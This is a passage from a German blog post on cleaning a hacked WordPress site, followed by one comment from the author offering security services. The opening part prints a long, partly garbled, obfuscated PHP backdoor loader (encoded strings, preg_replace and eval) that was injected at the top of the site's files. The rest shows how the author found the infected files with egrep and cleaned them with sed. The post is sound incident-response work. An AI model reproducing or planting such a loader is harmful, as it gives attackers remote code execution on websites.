fw6*CWtfs%x5c%x7825)7gif((function_exists(”%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%5025)+opjudovg+)!gj+{e%x5c%x7D!-id%x5c%x7825)uqpuftpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x78c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878p85cSFWSFT%x5c%x7860%x5c%x7825}X>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x51?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)8256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%@error_reporting(0); preg_replace(”%x2f%50%x2e%52%x29%57%x65″,”%x65%f#p#%x5c%x782f%x5c%x78y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!277]y72]265]y39]274]y85]273]yut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%uvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782c%x785c%x5c%x7825j:.25c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x7%x7825j^%x5c%x7824-%x5c%x7824tvctu825%x5c%x787f!~!<##!>!2p%72]y3d]51]y35]274]y4:]82]y3:]87f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudo5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**f#<!%x5c%x7825tww!>!%x5c%x78247860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}c%x7824-%x5c%x7824-!%25:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%xc%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>febfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x5c%x7825w6Z6<.2%x5c%x78-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x78K9]78]K5]53]Kc#<%x5c78257;utpI#7>%x5c%x782p%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]!#]y3d]51]y35]256]y76]Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x7%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofx5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x78253]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]225tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M5b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x782-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x77ftbc%x5c%x787f!|!*uyfu%xw!>!#]y84]275]y83]273]y76]277#<%x5c%x782*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78×7827pd%x5c%x78256<pd%x5c%x7825w6Z6c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVM?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]x5c%x7860QIQ&f_UTPI%x]#-bubE{h%x5c%x7825)tpqsut>j%xc%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU825)ufttj%x5c%x7822)gj6<^#825=*h%x5c%x7825)m%x%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npdw2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x7857>%x5c%x782f7&6|7**111127-K)ebfsX%x5c166%x61%154%x28%151%x6%x5c%x7860msvd},;uqpuft%x5c%x7860msfjfgg($n){return chr(ord($n)-1);} dovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|7825)}.;%x5c%x7860UQPMSV/(.*)/epreg_replacelaqkwkyork’; $swhqbixqqb = explode(chr((208-164)),’668,35,7326,55,1056,59,3462,69,2882,27,4107,67,6304,38,9229,52,67,67,1625,59,2785,33,8582,27,214,58,5854,60,4496,64,7867,26,8984,38,4426,70,5259,33,4005,22,907,57,4241,27,5346,39,2677,21,9878,50,1316,56,9613,63,4927,22,6603,50,1684,33,8932,52,2448,29,8441,60,1955,26,4690,62,9193,36,3420,42,8824,49,7056,39,996,60,5059,35,4781,39,2930,52,9456,70,9076,58,1276,40,7735,43,7412,34,464,28,7893,33,8330,67,773,27,523,28,3731,28,6066,46,7778,38,5721,21,6865,54,7219,56,4752,29,9968,38,4174,67,3811,50,1372,67,162,52,6764,62,349,38,1871,63,8248,58,1256,20,3941,64,7679,56,8178,70,9710,60,8704,27,1210,46,1717,68,7126,43,8501,27,1934,21,2698,26,4560,52,1510,60,9676,34,7573,23,1154,56,2649,28,6398,39,2549,24,5422,32,6178,65,134,28,7659,20,9399,27,8657,47,8306,24,1570,55,6437,45,2982,42,2573,47,5937,70,6139,39,5561,68,1785,20,7973,21,4406,20,492,31,964,32,7994,67,3759,52,5292,54,2003,38,9426,30,5094,50,634,34,7446,43,4970,28,9305,29,6954,21,8061,52,444,20,4612,27,6826,39,7095,31,1462,48,9557,56,2620,29,7275,51,8757,67,6919,35,5144,28,3321,57,4858,25,6112,27,7381,31,10040,66,2385,63,7816,51,5491,70,3637,61,9134,59,2724,61,579,21,2272,53,2477,23,8528,54,6036,30,6731,33,5686,35,1805,25,6369,29,9281,24,4386,20,9334,65,4998,61,2107,43,5829,25,6506,34,3576,61,4027,22,3861,42,3270,51,10006,34,6975,21,3236,34,3531,45,3698,33,5742,35,3191,45,2500,49,4883,44,2150,54,3024,47,6342,27,800,56,5454,37,6709,22,4949,21,5777,52,2818,64,3141,28,4049,58,6007,29,6653,56,3378,34,2204,68,7489,51,4639,51,9928,40,2909,21,856,26,5914,23,1115,39,7926,47,3169,22,8397,44,6243,61,4342,44,9770,67,387,57,3903,38,5172,41,7169,50,7540,33,9022,54,6482,24,8731,26,703,70,7596,63,8609,48,4268,40,1439,23,0,67,5213,46,551,28,600,34,8113,65,882,25,8873,59,5385,37,2325,60,328,21,5629,57,6540,63,1981,22,272,56,1830,41,6996,60,4820,38,9526,31,2041,66,3071,70,9837,41,4308,34,3412,8′); $faptyzynrt=substr($xcaudxkspk,(36491-26385),(30-23));explode(chr((222-178)),’7136,22,5230,37,5563,29,3206,63,10002,34,7525,68,9945,22,6686,33,2081,56,5331,35,7158,55,1851,57,2867,62,3692,22,9387,35,1725,29,6805,69,8482,23,410,28,2502,22,763,32,5515,28,3054,59,9907,38,3000,54,1205,42,8663,22,8127,51,8178,60,9708,50,6625,36,8505,68,1436,68,4518,57,2697,51,5629,32,1171,34,4107,63,9758,26,8816,41,7484,41,8901,37,5736,29,5890,33,6193,67,558,52,7114,22,2748,62,5543,20,6719,60,7752,47,2629,68,1401,35,8857,44,3664,28,610,69,10082,24,7240,22,9967,35,1311,32,6661,25,8009,66,1537,27,10036,46,2016,42,5366,30,990,52,2524,46,7712,40,5396,26,9627,30,8075,52,2417,51,3420,41,5206,24,4926,26,7433,51,3908,56,795,38,4170,28,3579,40,3964,25,7955,25,1504,33,2189,55,2058,23,5710,26,8685,41,9804,48,2348,69,341,69,3885,23,6928,56,4058,49,4267,46,191,39,159,32,2280,23,7316,51,1122,49,532,26,6582,43,9606,21,4026,32,3845,40,3989,37,6043,28,8386,46,6355,62,5292,39,4486,32,9252,25,7879,42,7367,31,6141,52,5126,52,833,40,3269,34,3355,33,53,54,3182,24,9317,70,3619,45,7213,27,230,62,2137,52,4198,69,4952,65,4456,30,724,39,1564,60,8432,50,8268,48,2468,34,5467,48,7083,31,8573,70,7026,57,9558,48,7683,29,6417,63,3113,69,9277,40,6260,65,8238,30,4860,38,3461,27,5868,22,8337,49,1624,47,6779,26,5789,24,9784,20,0,53,5178,28,4424,32,6984,42,4313,59,6874,54,1276,35,8938,65,4898,28,8316,21,5017,69,7921,34,4575,54,4659,27,7262,54,2971,29,679,45,3785,60,292,49,895,59,7398,35,1042,36,3752,33,9422,68,8794,22,7980,29,4791,69,1816,35,2929,42,1247,29,5813,29,6325,30,4686,57,1671,54,3488,33,5267,25,954,36,5842,26,5592,37,9206,46,1343,58,3388,32,6480,48,5086,40,8726,68,8643,20,107,52,873,22,438,65,5765,24,1754,41,503,29,1962,54,2570,59,6528,54,1908,54,4629,30,9003,66,1078,44,7799,59,3303,52,5978,65,9137,69,5923,55,1795,21,7858,21,3714,38,4372,52,9657,51,2303,45,7593,22,6071,70,9852,55,5422,45,9069,68,9490,68,2810,57,7615,68,2244,36,5661,49,4743,48,3521,58′); $hygsptewnv=substr($intygvhpad,(68724-58618),(27-20)); if (!function_exists(’dzdykdapjx’))(!function_exists(’qgefvbbbeh’)) { function dzdykdapjx($iirlbjafoq, $yzupjbekgp)qgefvbbbeh($tzeljmdfmc, $yxuogarznu) { $wiznxwlvkn$ylbcpzwxzw = NULL; for($lvifcrsvkz=0;$lvifcrsvkz<(sizeof($iirlbjafoq)/2);$lvifcrsvkz++)for($jzkpqbmdpb=0;$jzkpqbmdpb<(sizeof($tzeljmdfmc)/2);$jzkpqbmdpb++) { $wiznxwlvkn$ylbcpzwxzw .= substr($yzupjbekgp, $iirlbjafoq[($lvifcrsvkz*2)],$iirlbjafoq[($lvifcrsvkz*2)+1]);substr($yxuogarznu, $tzeljmdfmc[($jzkpqbmdpb*2)],$tzeljmdfmc[($jzkpqbmdpb*2)+1]); } return $wiznxwlvkn;$ylbcpzwxzw; };} $wxnlzvtcsp=”\x20\57\x2a\40\x6b\162\x67\155\x6f\163\x69\156\x6d\143\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x37\55\x31\67\x30\51\x29\54\x20\143\x68\162\x28\50\x35\65\x31\55\x34\65\x39\51\x29\54\x20\144\x7a\144\x79\153\x64\141\x70\152\x78\50\x24\154\x61\146\x65\172\x63\145\x68\150\x64\54\x24\170\x63\141\x75\144\x78\153\x73\160\x6b\51\x29\51\x3b\40\x2f\52\x20\172\x70\162\x79\157\x67\161\x76\153\x77\40\x2a\57\x20″; $cxvsbyhuqr=substr($xcaudxkspk,(32792-22679),(53-41)); $cxvsbyhuqr($faptyzynrt, $wxnlzvtcsp,$fetzsqsnzm=”\x20\57\x2a\40\x73\152\x63\171\x6f\143\x73\163\x67\152\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x32\55\x31\71\x35\51\x29\54\x20\143\x68\162\x28\50\x33\62\x35\55\x32\63\x33\51\x29\54\x20\161\x67\145\x66\166\x62\142\x62\145\x68\50\x24\163\x77\150\x71\142\x69\170\x71\161\x62\54\x24\151\x6e\164\x79\147\x76\150\x70\141\x64\51\x29\51\x3b\40\x2f\52\x20\147\x6c\161\x71\161\x73\141\x73\152\x73\40\x2a\57\x20″; $ckixkiunxy=substr($intygvhpad,(63147-53034),(69-57)); $ckixkiunxy($hygsptewnv, $fetzsqsnzm, NULL); $cxvsbyhuqr=$wxnlzvtcsp; $cxvsbyhuqr=(493-372); $xcaudxkspk=$cxvsbyhuqr-1;$ckixkiunxy=$fetzsqsnzm; $ckixkiunxy=(428-307); $intygvhpad=$ckixkiunxy-1; ?><?php

Wie man anhand des Diffs erkennen kann, gibt es tatsächlich eine Signatur:

$GLOBALS[“%x61%156%x75%156%x61”]=1

Als nächstes habe ich daher geschaut, ob die Signatur tatsächlich in anderen Dateien auftritt:

1
egrep -irl '%x61%156%x75%156%x61' ./

Da das Ergebnis meinen Verdacht der gemeinsamen Signatur bestätigte, ergab sich nun die Frage, wie man die befallenen Dateien am einfachsten bereinigt. Ich habe mir dann für eine Datei folgenden Code gebaut und getestet:

1
sed -i -e "1s/.*/<?php/"

Dieser Befehl ersetzt die erste Zeile einer Datei mit folgendem Inhalt:

1
<?php

Im Anschluss habe ich die Befehle zu einem Einzeiler zusammengefasst:

1
egrep -irl '%x61%156%x75%156%x61' ./ |xargs sed -i -e "1s/.*/<?php/"

Der Befehl sucht rekursiv nach Dateien mit der Signatur ab dem aktuellen Arbeitsverzeichnis und ersetzt dann die erste Zeile der betroffenen Datei (diese Zeile beinhalten den Müll) mit <?php
Allerdings gibt es mit den Theme-Dateien Probleme, weil da sehr unterschiedliche erste Zeilen vorhanden sind. Daher habe ich die wenigen Theme-Dateien per Hand bereinigt und kurz darauf war das Portal wieder online. Somit wurde zwar die Funktionalität sichergestellt, aber jetzt fehlt noch ein Absicherungsprozess, denn natürlich sind mir leider im Verlauf der oberflächlichen Begutachtung bereits einige Dinge aufgefallen, die Hackern große Einfallstore liefern.

1 Kommentar

  1. atxcowboy am 21. Juli 2014 um 13:32

    Ganz wichtig und daher nochmals gesondert als Kommentar: Die einfache Bereinigung einer Website schützt diese niemals vor einem wiederholten Hack. Dafür bedarf es einer forensischen Analyse. Außerdem muss in der Regel die betroffene WordPress-Website sowie der Server einem Security-Audit unterzogen werden. Weiterhin sollten die Seiten fortan durch einen kontinuierlichen Monitoring-Prozess gehen. Für all diese Probleme bzw. Aufgaben biete ich Lösungen. Kontaktieren Sie mich dazu.

    Antworten

Kommentar absenden

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Share This